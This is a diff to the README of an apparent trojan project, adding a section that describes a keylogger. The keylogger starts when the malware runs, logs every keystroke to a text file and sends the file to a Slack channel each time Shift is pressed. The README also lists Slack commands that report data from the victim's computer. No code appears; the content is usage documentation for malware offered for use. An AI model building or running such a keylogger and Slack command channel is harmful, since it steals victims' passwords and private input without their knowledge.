popolp/trojan-project-221/README.md

 BASE_CHANNEL_ID = your_slack_main_channel_id
 ```

+## About the keylogger

+The keylogger will automatically be activated when the malware runs.
+It will record all keyboard inputs into a txt file, and send it in the linked Slack channel whenever the 'Shift' key is pressed.

 ## Available commands via Slack

 * `/echo` - Simple echo command, will provide basic data on computer and channel.